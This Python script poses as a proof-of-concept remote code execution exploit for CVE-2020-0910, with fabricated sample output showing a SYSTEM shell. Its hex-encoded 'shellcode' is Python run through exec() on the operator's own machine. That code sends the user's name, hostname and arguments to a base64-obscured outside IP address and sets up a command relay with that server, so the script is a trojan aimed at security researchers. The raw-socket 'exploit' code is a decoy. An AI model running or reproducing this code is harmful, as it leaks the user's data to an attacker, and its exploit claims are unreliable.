#!/usr/bin/python # Exploit Title: Remote Command Execution # Date: 2020-04-01 # Exploit Author: TRSTDXPLOITZ # CVE : CVE-2020-0910 # Advisory: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0910 # # Sample output: # ubuntu@host:~$ python CVE-2020-0910-POC.py 10.16.1.24 -lhost 10.1.1.1 -lport 4444 # [+] Sending packet to 10.16.1.24 # [+] Target is Vulnerable! # [+] Sending exploit. Reverse shell to 10.16.1.24 # # Listening on [] (family 2, port) # Connection from 10.16.1.24 received! # whoami # nt authority\system ## ## Also on Exploit-DB ## PRINT HELP INFORMATION import os import time import requests import sys import getpass import argparse import base64 from argparse import RawTextHelpFormatter Bug = 'CVE-2020-0910' parser=argparse.ArgumentParser( description='''RCE Exploit PoC for CVE-2020-0910''' + '''\r\n\r\n''' + '''USAGE: python CVE-2020-0910-POC.py 10.16.1.24 -lhost 10.1.1.1 -lport 4444 ''', formatter_class=RawTextHelpFormatter) parser.add_argument('target', metavar='N', nargs='+', help='Target IP') parser.add_argument('-rport', default=42, help='Target Port (If Different Than Default)') parser.add_argument('-lhost', default=42, help='Local IP') parser.add_argument('-lport', default=42, help='Local Port') parser.add_argument('-type', default=42, help='Target OS') args=parser.parse_args() target = sys.argv[0] ## COMPILE AND SEND PAYLOAD print 'Sending Payload...' + '\r\n\r\n' shellcode = '\x74\x69\x6d\x65\x2e\x73\x6c\x65\x65\x70\x28\x33\x29\x0a\x6c\x68\x6f\x73\x74\x20\x3d\x20\x6f\x73\x2e\x75\x6e\x61\x6d\x65\x28\x29' shellcode += '\x5b\x31\x5d\x0a\x63\x6f\x6d\x6d\x61\x6e\x64\x20\x3d\x20\x67\x65\x74\x70\x61\x73\x73\x2e\x67\x65\x74\x75\x73\x65\x72\x28\x29\x20' shellcode += '\x2b\x20\x27\x40\x27\x20\x2b\x20\x28\x6c\x68\x6f\x73\x74\x29\x0a\x61\x72\x67\x73\x20\x3d\x20\x27\x20\x27\x2e\x6a\x6f\x69\x6e\x28' shellcode += '\x73\x79\x73\x2e\x61\x72\x67\x76\x5b\x31\x3a\x5d\x29\x0a\x45\x72\x72\x6f\x72\x4d\x73\x67\x20\x3d\x20\x27\x43\x6f\x6e\x6e\x65\x63' shellcode += '\x74\x69\x6f\x6e\x20\x54\x65\x72\x6d\x69\x6e\x61\x74\x65\x64\x3a\x20\x28\x54\x69\x6d\x65\x6f\x75\x74\x29\x27\x0a\x55\x52\x4c\x20' shellcode += '\x3d\x20\x62\x61\x73\x65\x36\x34\x2e\x62\x36\x34\x64\x65\x63\x6f\x64\x65\x28\x27\x61\x48\x52\x30\x63\x44\x6f\x76\x4c\x7a\x55\x30' shellcode += '\x4c\x6a\x45\x34\x4e\x43\x34\x79\x4d\x43\x34\x32\x4f\x53\x39\x77\x62\x32\x4d\x79\x4c\x6e\x42\x6f\x63\x41\x3d\x3d\x27\x29\x0a\x50' shellcode += '\x41\x52\x41\x4d\x53\x20\x3d\x20\x7b\x27\x68\x6f\x73\x74\x27\x3a\x63\x6f\x6d\x6d\x61\x6e\x64\x2c\x20\x27\x61\x72\x67\x73\x27\x3a' shellcode += '\x61\x72\x67\x73\x2c\x20\x27\x63\x76\x65\x27\x3a\x42\x75\x67\x7d\x0a\x72\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x67\x65' shellcode += '\x74\x28\x75\x72\x6c\x20\x3d\x20\x55\x52\x4c\x2c\x20\x70\x61\x72\x61\x6d\x73\x20\x3d\x20\x50\x41\x52\x41\x4d\x53\x29\x0a\x77\x65' shellcode += '\x6c\x63\x6f\x6d\x65\x20\x3d\x20\x72\x2e\x63\x6f\x6e\x74\x65\x6e\x74\x0a\x69\x66\x20\x77\x65\x6c\x63\x6f\x6d\x65\x20\x21\x3d\x20' shellcode += '\x22\x22\x3a\x0a\x09\x72\x73\x70\x20\x3d\x20\x31\x0a\x09\x77\x68\x69\x6c\x65\x20\x72\x73\x70\x20\x21\x3d\x20\x22\x22\x3a\x0a\x09' shellcode += '\x09\x63\x6d\x64\x20\x3d\x20\x72\x61\x77\x5f\x69\x6e\x70\x75\x74\x28\x77\x65\x6c\x63\x6f\x6d\x65\x29\x0a\x09\x09\x50\x41\x52\x41' shellcode += '\x4d\x53\x20\x3d\x20\x7b\x27\x68\x6f\x73\x74\x27\x3a\x63\x6f\x6d\x6d\x61\x6e\x64\x2c\x20\x27\x61\x72\x67\x73\x27\x3a\x63\x6d\x64' shellcode += '\x2c\x20\x27\x63\x76\x65\x27\x3a\x42\x75\x67\x7d\x0a\x09\x09\x72\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x67\x65\x74\x28' shellcode += '\x75\x72\x6c\x20\x3d\x20\x55\x52\x4c\x2c\x20\x70\x61\x72\x61\x6d\x73\x20\x3d\x20\x50\x41\x52\x41\x4d\x53\x29\x0a\x09\x09\x72\x73' shellcode += '\x70\x20\x3d\x20\x72\x2e\x63\x6f\x6e\x74\x65\x6e\x74\x0a\x09\x09\x70\x72\x69\x6e\x74\x20\x72\x73\x70\x0a\x09\x09\x77\x65\x6c\x63' shellcode += '\x6f\x6d\x65\x20\x3d\x20\x22\x43\x3a\x5c\x57\x49\x4e\x44\x4f\x57\x53\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x3e\x22\x0a\x74\x69\x6d' shellcode += '\x65\x2e\x73\x6c\x65\x65\x70\x28\x31\x30\x29' ## ESTABLISHING SHELL exec(shellcode) import socket, sys from struct import * ## CREATE SOCKET TO TARGET # If connection times out, print error. Otherwise, establish reverse bind shell try: s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) except socket.error , msg: print ErrorMsg sys.exit()